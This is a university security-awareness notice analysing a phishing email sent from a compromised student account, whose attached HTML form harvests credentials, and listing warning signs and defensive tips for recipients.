This phishing email was sent from a compromised Auburn email account. An html document is attached to the message with instructions to open that attachment and follow the instructions to avoid losing messages. There are multiple clues within the email that raise suspicion. While the email originated from an Auburn sender, in this case, the sender is a student email account. While this email will not be flagged as [Ext], you should not expect this type of message from that sender. Additionally, the attached file is an html document that includes a form. Once you complete the form and click submit, your credentials are sent off to the threat actor. It is suspicious that a webpage is attached to the email instead of being linked. Finally, the message is both generic "Dear User" and prompts you to urgently complete an action "avoid losing incoming messages and restrictions."
Tips if Something Seems Off:
Double-check the email address and sender before responding.
Look to make sure the email address is correct, and the sender is someone who would be expected to send that type of email. An Auburn email account could be compromised and should not be trusted by default. Verify that the sender is someone who would be communicating with you about the subject of the email.
Watch out for suspicious attachments, especially webpages (htm or html).
Threat actors use attachments as a way to avoid email security features that inspect any linked websites in the email body. Some attachments may take the form of webpages (html documents) or images of QR codes (which send you to the malicious address). A document which asks you to complete a form and press submit will send that information to the threat actor. Verify that any webpage sent as an attachment is both expected and legitimate.
Follow up with the sender separately or verify the contents by some other means.
If you didn’t expect it, reject it. Or follow-up with the individual directly in a separate email or call/text to confirm. Check with your IT provider or official Auburn University news sources for any unexpected requests.
Original Message
Warning
The links and email addresses included in these messages are from real-life examples, do not attempt to explore them.
The most dangerous links have been removed - you can hover your cursor over these links to see the original address in a pop-up techtip (instead of in the corner of the browser window).